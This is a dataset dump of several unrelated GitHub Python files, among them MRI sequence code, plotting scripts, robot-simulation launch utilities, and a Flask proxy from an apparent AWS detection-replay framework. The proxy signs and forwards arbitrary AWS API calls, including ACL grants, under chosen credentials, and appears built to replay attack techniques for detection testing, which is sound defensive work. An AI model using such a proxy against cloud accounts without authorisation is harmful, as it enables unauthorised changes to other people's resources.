phase_offset=self.phase_offset_rad, type='adc'\n )\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n amplitude = np.array([0, 0, 1, 1, 0])\n times = np.array(\n [0, self.t_delay_s - 1e-9, self.t_delay_s + 1e-9, self.get_duration() - 1e-9, self.get_duration() + 1e-9])\n ax.plot(times * 1e3, amplitude)\n ax.set_xlabel(\"time [ms]\")\n ax.set_ylabel(\"ADC\")\n plt.show()\n\n def set_on_raster(self):\n raster_time = float(self.system.adc_raster_time)\n to_set = [\"t_dwell_s\", \"t_delay_s\", \"t_duration_s\"]\n # save number of samples\n n = int(self.t_duration_s / self.t_dwell_s)\n for key in to_set:\n value = self.__getattribute__(key)\n if np.abs(value) % raster_time > 1e-9:\n rastered_value = np.ceil(value / raster_time) * raster_time\n self.__setattr__(key, rastered_value)\n if key == \"t_dwell_s\":\n # if dwell changed adopt\n self.t_duration_s = n * self.t_dwell_s\n\n\nclass DELAY(Event):\n 
def __init__(self):\n super().__init__()\n self.system = pp.Opts()\n\n @classmethod\n def make_delay(cls, delay: float, system: pp.Opts = pp.Opts()):\n delay_instance = cls()\n delay_instance.system = system\n delay_instance.t_duration_s = delay\n delay_instance.set_on_block_raster()\n return delay_instance\n\n def check_on_block_raster(self) -> bool:\n us_raster = 1e6 * self.system.grad_raster_time\n us_value = 1e6 * self.t_duration_s\n if us_value % us_raster < 1e-4:\n rastered_value = us_value * 1e-6\n else:\n rastered_value = np.round(us_value / us_raster) * us_raster\n if np.abs(rastered_value - self.t_duration_s) > 1e-8:\n return False\n else:\n return True\n\n def set_on_block_raster(self):\n us_raster = 1e6 * self.system.grad_raster_time\n us_value = 1e6 * self.t_duration_s\n if us_value % us_raster < 1e-4:\n rastered_value = us_value\n else:\n rastered_value = int(np.ceil(us_value / us_raster) * us_raster)\n self.t_duration_s = rastered_value * 1e-6\n\n def get_duration(self):\n return self.t_duration_s\n\n def to_simple_ns(self):\n return types.SimpleNamespace(delay=self.t_duration_s, type='delay')\n\n\nif __name__ == '__main__':\n rf = pp.make_sinc_pulse(\n np.pi / 2,\n system=pp.Opts(),\n use='excitation'\n )\n rf_new = RF.make_sinc_pulse(\n flip_angle_rad=np.pi / 2,\n pulse_type='excitation',\n system=pp.Opts()\n )\n rf_new_ns = rf_new.to_simple_ns()\n logModule.info(\"compare rf\")\n\n grad_ns = pp.make_extended_trapezoid(\n 'z',\n amplitudes=np.array([0, 755857.8987, 755857.8987, 0]),\n times=np.array([0, 0.00011, 0.00189, 0.002])\n )\n grad_new = GRAD.make_trapezoid('z', system=pp.Opts(), area=1 / 0.7 * 1e3, duration_s=2e-3)\n grad_new_ns = grad_new.to_simple_ns()\n logModule.info(\"compare grad\")\n\n adc_ns = pp.make_adc(num_samples=304, duration=3e-3)\n adc_new = ADC.make_adc(system=pp.Opts(), num_samples=304, duration_s=3e-3)\n adc_new_ns = adc_new.to_simple_ns()\n\n logModule.info(\"compare adc\")\n\n delay_ns = pp.make_delay(1e-3)\n delay_new = DELAY.make_delay(1e-3)\n\n logModule.info(\"compare delays\")\n","repo_name":"schmidtijoe/jstmc","sub_path":"jstmc/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":32586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18529504261","text":"import csv\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nfig, ax =plt.subplots()\n\nfilename = 'sitka_weather_2018_full.csv'\nwith open(filename) as f:\n\treader = csv.reader(f)\n\theader_row = next(reader)\n\tdates, highs ,lows = [] ,[], []\n\tfor row in reader:\n\t\tcurrent_date = datetime.strptime(row[2], '%d/%m/%Y')\n\t\thigh = int(row[8])\n\t\tlow = int(row[9])\n\t\thighs.append(high)\n\t\tlows.append(low)\n\t\tdates.append(current_date)\n\nax.plot(dates, highs, c ='red')\nax.plot(dates, lows, c='blue')\nax.set_title('Daily Temperatures(2018/19)',fontsize = 15)\nax.set_xlabel('Dates')\nax.set_ylabel('Temperatures (F)')\nax.tick_params(axis = 'both', which = 'major', labelsize = 10)\nax.fill_between(dates,highs, lows, facecolor = 'lightblue')\nfig.autofmt_xdate()\nplt.show()\n\n\n\n\n\n\t\t\n\t\t\n","repo_name":"KevinOti/Weather_viz_in_python","sub_path":"Matplotlib.py","file_name":"Matplotlib.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34607002184","text":"from sau import Sau\nfrom ulv import Ulv\nfrom spillbrett import Spillbrett\nfrom spillbrett 
import har_kollidert\nfrom gress import Gress\nfrom stein import Stein\n\ndef test_sau():\n    sau = Sau(\"sau\", 10, 20)\n    sau.sett_posisjon(0,0)\n    sau.sett_fart(10,20)\n    sau.beveg()\n    sau.beveg()\n\n    assert sau.hent_posisjon_venstre() == 20\n    assert sau.hent_posisjon_topp() == 40\n\n    sau.snu()\n\n    assert sau.hent_fart_fra_venstre() == -10\n    assert sau.hent_fart_fra_topp() == -20\n\n    sau.beveg()\n\n    assert sau.hent_posisjon_venstre() == 10\n    assert sau.hent_posisjon_topp() == 20\n\ntest_sau()\n\ndef test_finn_naermeste_sau():\n    brett = Spillbrett()\n    brett.opprett_sau(\"sau\", 0, 0)\n    brett.opprett_sau(\"sau\", 100, 100)\n    ulv = brett.opprett_ulv(\"ulv\", 90, 80, brett)\n    ulv = Ulv(\"ulv\", 90, 80, brett)\n    ulv.finn_naermeste_sau(brett.hent_sauer())\n\ntest_finn_naermeste_sau()\n\ndef test_har_kollidert():\n    # Test case 1: These two objects have collided, because the wolf partially overlaps the sheep\n    sau = Sau(\"sau\", 50, 50)\n    ulv = Ulv(\"ulv\", 60, 60, brett=0)\n    assert har_kollidert(sau, ulv)\n    # The order should not matter\n    assert har_kollidert(ulv, sau)\n    \n    # Test case 2: These two objects lie right next to each other \n    # and have not collided (remember that they are 50px wide/tall):\n    gress = Gress(\"gress\", 100, 100)\n    sau = Sau(\"sau\", 150, 150)\n    assert not har_kollidert(gress, sau)\n    \n    # Implement two more test cases here: \n    sau = Sau(\"sau\", 0, 49)\n    stein = Stein(\"stein\", 49, 0)\n    assert har_kollidert(sau, stein)\n\n    sau = Sau(\"sau\", 700, 0)\n    ulv = Ulv(\"ulv\", 0, 0, 0)\n    assert har_kollidert(sau, ulv)\n\ntest_har_kollidert()","repo_name":"Bsian02/uio","sub_path":"IN1000/Obliger/Uke 8 og 9 redo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"no","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
+{"seq_id":"3950726629","text":"import play_csv\nimport string\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom gensim.models.word2vec import Word2Vec\nimport sys \nimport json\n\ntext = sys.argv[1]  # parse() expects a string, not a single-element list\nmovies = play_csv.play_csv()\n\n\ndef get_data_set():\n    data_set = []\n    for movie in movies:\n        title = movie.get('Title')\n        genres = movie.get('Genre')\n        tags = movie.get('Tags')\n\n        exclude = set(string.punctuation + string.digits)\n        title = ''.join(ch for ch in title if ch not in exclude)\n\n        for i in sent_tokenize(title):\n            temp = []\n            for j in word_tokenize(i):\n                temp.append(j.lower())\n            data_set.append(temp)\n\n        for genre in genres:\n            for i in sent_tokenize(genre):\n                temp = []\n                for j in word_tokenize(i):\n                    temp.append(j.lower())\n                data_set.append(temp)\n\n        for tag in tags:\n            if tag is not None:\n                for i in sent_tokenize(tag):\n                    temp = []\n                    for j in word_tokenize(i):\n                        temp.append(j.lower())\n                    data_set.append(temp)\n    return data_set\n\n\ndef parse(user_input):\n    exclude = set(string.punctuation)\n    user_input = ''.join(ch for ch in user_input if ch not in exclude)\n    temp = []\n    for i in word_tokenize(user_input):\n        temp.append(i.lower())\n    return temp\n\n\ndef get_similarities(user_input):\n    words = parse(user_input)\n    data_set = get_data_set()\n    cbow_model = Word2Vec(data_set, min_count=1, size=100, window=10)\n    similarities = []\n    for word in words:\n        cbow_prediction = cbow_model.wv.most_similar(word, topn=1)\n        syn = cbow_prediction[0][0]\n        similarities.append(syn)\n    return similarities\n\n\ndef get_recommendations(user_input):\n    movies_recommendations = []\n    similarities = get_similarities(user_input)\n    for word in similarities:\n        for movie in movies:\n            title = movie.get('Title')\n            genres = 
movie.get('Genre')\n            tags = movie.get('Tags')\n            if word in title or word in genres or word in tags:\n                movies_recommendations.append(movie)\n    sorted_movies = sorted(movies_recommendations, key=lambda j: j['Rating'], reverse=True)\n    top_movies = []\n    for i in range(min(10, len(sorted_movies))):  # guard against fewer than 10 matches\n        top_movies.append(sorted_movies[i])\n    print(json.dumps(top_movies))\n\n\nget_recommendations(text)\n","repo_name":"adriangotca98/MovieRecommender","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"4811112369","text":"import socket\nimport random\nimport os\nimport pathlib\n\nfrom datetime import datetime\nfrom billiard import Process\n\nfrom ament_index_python.packages import get_package_prefix\nfrom launch import LaunchService, LaunchDescription\nfrom launch.actions.execute_process import ExecuteProcess\nfrom launch_ros.actions import Node\nfrom launch.actions import IncludeLaunchDescription, DeclareLaunchArgument, TimerAction, ExecuteProcess\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch.substitutions import Command, PathJoinSubstitution, LaunchConfiguration\nfrom ament_index_python import get_package_share_directory\nimport yaml\nfrom launch_ros.descriptions import ParameterValue\nimport time\nimport json\n\nimport gym_gazebo2\nfrom gym_gazebo2.utils import ut_generic\n\nMARA_PATH = \"/PATH/TO/MARA/WORKSPACE\" # TO BE MODIFIED\n\ndef startLaunchServiceProcess(launchDesc):\n    \"\"\"Starts a Launch Service process. To be called from subclasses.\n\n    Args:\n        launchDesc : LaunchDescription obj.\n    \"\"\"\n    # Create the LaunchService and feed the LaunchDescription obj. to it.\n    launchService = LaunchService()\n    launchService.include_launch_description(launchDesc)\n    process = Process(target=launchService.run)\n    # The daemon process is terminated automatically before the main program exits,\n    # to avoid leaving orphaned processes running\n    process.daemon = True\n    process.start()\n\n    return process\n\ndef isPortInUse(port):\n    \"\"\"Checks if the given port is being used.\n\n    Args:\n        port(int): Port number.\n\n    Returns:\n        bool: True if the port is being used, False otherwise.\n    \"\"\"\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socket1:\n        return socket1.connect_ex(('localhost', port)) == 0\n\ndef getExclusiveNetworkParameters():\n    \"\"\"Creates appropriate values for ROS_DOMAIN_ID and GAZEBO_MASTER_URI.\n\n    Returns:\n        Dictionary {ros_domain_id (string), gazebo_master_uri (string)}\n    \"\"\"\n\n    randomPortROS = random.randint(0, 230)\n    randomPortGazebo = random.randint(10000, 15000)\n    while isPortInUse(randomPortROS):\n        print(\"Randomly selected port is already in use, retrying.\")\n        randomPortROS = random.randint(0, 230)\n\n    while isPortInUse(randomPortGazebo):\n        print(\"Randomly selected port is already in use, retrying.\")\n        randomPortGazebo = random.randint(10000, 15000)\n\n    # Save network segmentation related information in a temporary folder.\n    tempPath = '/tmp/gym-gazebo-2/running/'\n    pathlib.Path(tempPath).mkdir(parents=True, exist_ok=True)\n\n    # Remove old tmp files.\n    ut_generic.cleanOldFiles(tempPath, \".log\", 2)\n\n    filename = datetime.now().strftime('running_since_%H_%M__%d_%m_%Y.log')\n\n    file = open(tempPath + '/' + filename, 'w+')\n    file.write(filename + '\\nROS_DOMAIN_ID=' + str(randomPortROS) \\\n        + '\\nGAZEBO_MASTER_URI=http://localhost:' + str(randomPortGazebo))\n    file.close()\n\n    return 
{'ros_domain_id':str(randomPortROS),\n            'gazebo_master_uri':\"http://localhost:\" + str(randomPortGazebo)}\n\ndef generateLaunchDescriptionDIANA(gzclient, multiInstance, port):\n    \"\"\"\n        Returns ROS2 LaunchDescription object.\n        Args:\n            gzclient: bool, True to launch the Gazebo GUI client, False for headless gzserver.\n            multiInstance: bool, True to use exclusive network segmentation so that multiple\n                ROS2+Gazebo instances can run in parallel.\n            port: int, Gazebo master port; 11345 selects the default network setup.\n    \"\"\"\n\n    root_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../..'))\n\n    print(\"\\n\\n\\n\\n\\n\\n Generating Launch Description DIANA\")\n\n    os.environ['AMENT_PREFIX_PATH'] = f'{MARA_PATH}/install:/opt/ros/humble:{root_dir}/resources/tb2_ugv:{root_dir}/resources/rosbot_ugv:{root_dir}/resources/pic4rl_testing:{root_dir}/resources/pic4rl:{root_dir}/resources/jackal_ugv:{root_dir}/resources/husky_ugv:{root_dir}/resources/gazebo_sim:{root_dir}/resources/cheddar_ugv:/opt/ros/humble'\n\n\n    installDir = get_package_prefix('mara_gazebo_plugins')\n    print(\"installDir: \", installDir)\n    \n\n    if 'GAZEBO_MODEL_PATH' in os.environ:\n        os.environ['GAZEBO_MODEL_PATH'] = os.environ['GAZEBO_MODEL_PATH'] + ':' + installDir \\\n            + '/share'\n    else:\n        os.environ['GAZEBO_MODEL_PATH'] = installDir + \"/share\"\n\n    if 'GAZEBO_PLUGIN_PATH' in os.environ:\n        os.environ['GAZEBO_PLUGIN_PATH'] = os.environ['GAZEBO_PLUGIN_PATH'] + ':' + installDir \\\n            + '/lib'\n    else:\n        os.environ['GAZEBO_PLUGIN_PATH'] = installDir + '/lib'\n\n    if port != 11345: # Default gazebo port\n        os.environ[\"ROS_DOMAIN_ID\"] = str(port)\n        os.environ[\"GAZEBO_MASTER_URI\"] = \"http://localhost:\" + str(port)\n        print(\"******* Manual network segmentation *******\")\n        print(\"ROS_DOMAIN_ID=\" + os.environ['ROS_DOMAIN_ID'])\n        print(\"GAZEBO_MASTER_URI=\" + os.environ['GAZEBO_MASTER_URI'])\n        print(\"\")\n    elif multiInstance:\n        # Exclusive network segmentation, which allows to launch multiple instances of ROS2+Gazebo\n        networkParams = getExclusiveNetworkParameters()\n        os.environ[\"ROS_DOMAIN_ID\"] = networkParams.get('ros_domain_id')\n        os.environ[\"GAZEBO_MASTER_URI\"] = networkParams.get('gazebo_master_uri')\n        print(\"******* Exclusive network segmentation *******\")\n        print(\"ROS_DOMAIN_ID=\" + networkParams.get('ros_domain_id'))\n        print(\"GAZEBO_MASTER_URI=\" + networkParams.get('gazebo_master_uri'))\n        print(\"\")\n\n    try:\n        envs = {}\n        for key in os.environ.__dict__[\"_data\"]:\n            key = key.decode(\"utf-8\")\n            if key.isupper():\n                envs[key] = os.environ[key]\n    except BaseException as exception:\n        print(\"Error with Envs: \" + str(exception))\n        return None\n    \n    print(\"Envs: \", envs)\n    \n\n    # Gazebo visual interface. 
GUI/no GUI options.\n if gzclient:\n gazeboCmd = \"gazebo\"\n else:\n gazeboCmd = \"gzserver\"\n\n print(\"gazeboCmd: \", gazeboCmd)\n \n ## Creation of ROS2 LaunchDescription obj.\n\n # Fetching Simulation Parameters from config file in gazebo_sim/config/sim_params.yaml\n # This file only contains the name of the package that contains the main_params.yaml\n simulation_configFilepath = os.path.join(\n get_package_share_directory(\"gazebo_sim\"), 'config',\n 'sim_params.yaml'\n )\n print(\"simulation_configFilepath: \", simulation_configFilepath)\n \n # Read the package name from the config file\n with open(simulation_configFilepath, 'r') as file:\n mode_package = yaml.safe_load(file)['sim_parameters'][\"package_name\"]\n # mode_package: pic4rl\n print(\"mode_package: \", mode_package)\n \n # Fetching Main Parameters from config file in pic4rl/config/main_params.yaml\n configFilepath = os.path.join(\n get_package_share_directory(mode_package), 'config',\n 'main_params.yaml'\n )\n print(\"configFilepath: \", configFilepath)\n \n # Read the parameters from the config file\n with open(configFilepath, 'r') as file:\n configParams = yaml.safe_load(file)['main_node']['ros__parameters']\n print(\"configParams: \", configParams)\n \n # Fetching Goals and Poses from config file in pic4rl/goals_and_poses/new_indoor.json\n goals_path = os.path.join(\n get_package_share_directory(mode_package), \n 'goals_and_poses', \n configParams['data_path']\n )\n print(\"goals_path: \", goals_path)\n \n goal_and_poses = json.load(open(goals_path,'r'))\n print(\"goal_and_poses: \", goal_and_poses)\n \n robot_pose, goal_pose = goal_and_poses[\"initial_pose\"], goal_and_poses[\"goals\"][0]\n print(\"robot_pose: \", robot_pose)\n print(\"goal_pose: \", goal_pose)\n \n x_rob = '-x '+str(robot_pose[0])\n y_rob = '-y '+str(robot_pose[1])\n z_rob = '-z '+str(0.3) \n yaw_rob = '-Y ' +str(robot_pose[2])\n\n x_goal = '-x '+str(goal_pose[0])\n y_goal = '-y '+str(goal_pose[1])\n\n # Fetching Robot Package Name from config file in pic4rl/config/main_params.yaml\n robot_pkg = get_package_share_directory(configParams[\"robot_name\"])\n print(\"robot_pkg: \", robot_pkg) \n\n # Fetching Goal Entity from config file in gazebo_sim/models/goal_box/model.sdf\n goal_entity = os.path.join(get_package_share_directory(\"gazebo_sim\"), 'models', \n 'goal_box', 'model.sdf')\n print(\"goal_entity: \", goal_entity)\n \n # For now we use a fixed world file\n worldPath = f\"{root_dir}/environments/gym-gazebo2/gym_gazebo2/worlds/marsyard_ERC23.world\"\n print(\"worldPath: \", worldPath)\n \n\n use_sim_time_arg = DeclareLaunchArgument(\n 'use_sim_time',\n default_value = \"true\",\n description = 'Use simulation clock if true')\n print(\"use_sim_time_arg: \", use_sim_time_arg)\n \n robot_description = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n \t\tos.path.join(robot_pkg,'launch', 'description.launch.py')\n )\n )\n print(\"robot_description: \", robot_description)\n \n spawn_robot = Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n output='screen',\n arguments=['-entity',configParams[\"robot_name\"], x_rob, y_rob, z_rob, yaw_rob, '-topic','/robot_description'],\n )\n print(\"spawn_robot: \", spawn_robot)\n\n spawn_goal = Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n output='screen',\n arguments=['-entity', 'goal', '-file', goal_entity, x_goal, y_goal]\n )\n print(\"spawn_goal: \", spawn_goal)\n \n gazebo = ExecuteProcess(\n cmd=[gazeboCmd,'--verbose', worldPath, 
'-s','libgazebo_ros_init.so','-s','libgazebo_ros_factory.so'],\n output='screen',\n env=envs\n )\n print(\"gazebo: \", gazebo)\n \n launchDesc = LaunchDescription([\n use_sim_time_arg,\n robot_description,\n spawn_robot,\n spawn_goal,\n TimerAction(period=0., actions=[gazebo]),\n ])\n print(\"launchDesc: \", launchDesc)\n \n print(\"LaunchDescription generated.\")\n return launchDesc\n\ndef launchReal():\n os.environ[\"ROS_DOMAIN_ID\"] = str(22)\n #os.environ[\"RMW_IMPLEMENTATION\"] = \"rmw_opensplice_cpp\"\n os.environ[\"RMW_IMPLEMENTATION\"] = \"rmw_fastrtps_cpp\"\n installDir = get_package_prefix('mara_gazebo_plugins')\n launchDesc = LaunchDescription([\n Node(package='hros_cognition_mara_components',\n node_executable='hros_cognition_mara_components',\n arguments=[\"-motors\", installDir \\\n + \"/share/hros_cognition_mara_components/motors.yaml\", \"real\"], output='screen')\n ])\n return launchDesc\n","repo_name":"Anatr1/DIANA-Gym","sub_path":"environments/gym-gazebo2/gym_gazebo2/utils/ut_launch.py","file_name":"ut_launch.py","file_ext":"py","file_size_in_byte":10475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"34725060831","text":"from email import header\nimport os\nimport base64\nimport hashlib\nfrom flask import Flask, json, request, abort, jsonify\nfrom requests_aws4auth import AWS4Auth\nfrom requests_aws4auth import PassiveAWS4Auth\nimport requests as requests\nimport xmltodict\nfrom xml.parsers.expat import ExpatError\n\napp = Flask(__name__)\n\n\n@app.route('/submitRequest', methods=['POST'])\ndef validate_post():\n data = request.json\n if 'HOST' not in data:\n abort(400, description='missing HOST')\n elif 'REGION' not in data:\n abort(400, description='missing REGION')\n elif 'SERVICE' not in data:\n abort(400, description='missing SERVICE')\n elif 'ENDPOINT' not in data:\n abort(400, description='missing ENDPOINT')\n elif 'VERB' not in data:\n abort(400, description='missing VERB')\n else:\n return submit_request(), 200, {'Content-Type': 'application/json; charset=utf-8'}\n\n#return errors as JSON, otherwise it would be HTML\n@app.errorhandler(400)\ndef bad_request(message):\n return jsonify(error=str(message)), 400\n\n\ndef submit_request():\n data = request.json\n\n## Baseline Headers\n headers = {\n 'User-Agent': data['UA'] if 'UA' in data else 'detection-replay-framework',\n 'Connection': 'close', \n 'Accept-Encoding': 'gzip, deflate',\n 'Host': data['HOST']\n }\n\n## Assign the Content-Type Header for PUT and POST requests\n headers['Content-Type'] = data['CONTENT'] if 'CONTENT' in data else print(\"no CONTENT parameter provided\")\n\n\n## Handle setting the Body for PUT and POST requests\n body = data['BODY'] if 'BODY' in data else ''\n\n\n## Set the TARGET Header for unique AWS services which use this value for routing.\n headers['X-Amz-Target'] = data['TARGET'] if 'TARGET' in data else print(\"no TARGET parameter provided\")\n\n# S3 Configurations\n## Assign S3 headers during copy events.\n headers['x-amz-copy-source'] = data['SOURCEBUCKET'] if 'SOURCEBUCKET' in data else print(\"no SOURCEBUCKET parameter provided\")\n\n\n## Assign headers associated with the assignment of canned ACLs\n headers['x-amz-acl'] = data['ACL'] if 'ACL' in data else ''\n\n\n## Assign headers associated with non-cannned, grantee ACLs.\n headers['x-amz-grant-read'] = data['GRANTREADACL'] if 'GRANTREADACL' in data else print(\"no GRANTREADACL parameter provided\")\n headers['x-amz-grant-write'] = data['GRANTWRITEACL'] if 
'GRANTWRITEACL' in data else print(\"no GRANTWRITEACL parameter provided\")\n headers['x-amz-grant-full-control'] = data['GRANTFULLACL'] if 'GRANTFULLACL' in data else print(\"no GRANTFULLACL parameter provided\") \n\n## Handle headers associated with KMS encryption.\n headers['x-amz-server-side-encryption'] = data['SSE'] if 'SSE' in data else print(\"no SSE parameter provided\")\n headers['x-amz-server-side-encryption-aws-kms-key-id'] = data['KMS-KEY-ID'] if 'KMS-KEY-ID' in data else print(\"no KMS-KEY-ID parameter provided\")\n\n## Assign and calculate headers for MD5 digest - only required in a handful of S3 calls.\n if 'MD5' in data:\n contents = body\n md = hashlib.md5(contents.encode('utf-8')).digest()\n contents_md5 = base64.b64encode(md).decode('utf-8')\n headers['Content-MD5'] = contents_md5\n else:\n print(\"no MD5 digest header required or included\")\n\n\n## Handle the 'USER' parameter so the detection can be run as different users\n try:\n if 'USER' in data:\n print(\"Accessing keys for user specified in 'user' parameter\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID_' + data['USER']]\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY_' + data['USER']]\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE']) \n if 'MD5' in data:\n print(\"elif MD5 in data\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID_' + data['USER']]\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY_' + data['USER']]\n hdrs = set({'host', 'content-type', 'date', 'x-amz-*', 'content-md5'})\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'], include_hdrs=hdrs) \n if 'USER' not in data:\n print(\"Accessing keys for default user with ELSE block\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID']\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'])\n except:\n print(\"specified user does not exists, deprovision them before re-provisioning\")\n auth = None\n\n\n## Handle the passing of temporary session credentials directly to the app so the detection can be \n## run as a role on the fly\n\n try:\n if data['TEMPCREDSPASSED'] == \"yes\":\n print(\"if TEMPCREDSPASSED == YES\")\n accessKeyId = data['ACCESSKEYID']\n accessKeySecret = data['ACCESSKEYSECRET']\n accessKeySessionToken = data['SESSIONTOKEN']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'], session_token=accessKeySessionToken)\n else:\n print(\"if TEMPCREDSPASSED else\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID']\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'])\n except:\n print(\"if TEMPCREDSPASSED except\")\n \n\n\n## POST HTTP Requests\n if data['VERB'] == 'POST':\n\n response = requests.post(data['ENDPOINT'], data=body, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except 
(xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 4\")\n jsonResponse = str(response.text.strip())\n\n\n\n\n\n## PUT HTTP Requests\n elif data['VERB'] == 'PUT':\n\n response = requests.put(data['ENDPOINT'], data=body, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"PUT: In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"PUT: In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"PUT: In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"PUT: In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"PUT: In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"PUT: In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"PUT: In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"PUT: In except block 4\")\n jsonResponse = str(response.text.strip())\n\n \n\n\n## DELETE HTTP Requests\n elif data['VERB'] == 'DELETE':\n queryParameters = data['queryParameters'] if 'queryParameters' in data else ''\n\n response = requests.delete(data['ENDPOINT'], params=queryParameters, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 4\")\n jsonResponse = str(response.text.strip())\n\n\n\n## GET HTTP Requests\n elif data['VERB'] == 'GET':\n queryParameters = data['queryParameters'] if 'queryParameters' in data else ''\n response = requests.get(data['ENDPOINT'], params=queryParameters, headers=headers, auth=auth)\n \n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = 
response.json()\n            except:\n                print(\"In except block 2\")\n                jsonResponse = json.dumps({})\n        elif \"text/xml\" in contentType:\n            try:\n                print(\"In TRY block 3\")\n                jsonResponse = xmltodict.parse(response.text)\n            except (xmltodict.ParsingInterrupted, ExpatError):\n                print(\"In except block 3\")\n                jsonResponse = str(response.text.strip())\n        else:\n            try:\n                print(\"In TRY block 4\")\n                jsonResponse = json.dumps(xmltodict.parse(response.text))\n            except (xmltodict.ParsingInterrupted, ExpatError):\n                print(\"In except block 4\")\n                jsonResponse = str(response.text.strip())\n\n    \n## Else abort on an incorrect or missing VERB parameter.\n    else:\n        print(\"final else block in VERB processing\") \n        # abort here: falling through would reference undefined jsonResponse / response.status_code below\n        abort(400, description='Error - Unable to send the HTTP request to AWS with the provided Method')\n\n\n## Return response\n    print(jsonResponse);\n    if response.status_code:\n        print(\"if response.status_code\")\n        Result = {\"responseBody\":jsonResponse,\"responseCode\":response.status_code}\n        print(Result);\n    else:\n        print(\"else block when returning result\")\n        Result = \"Error in executing request in AWS\"\n\n    return Result\n\nif __name__ == '__main__':\n    app.run() ","repo_name":"vectra-ai-research/derf","sub_path":"aws-proxy-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"60"}
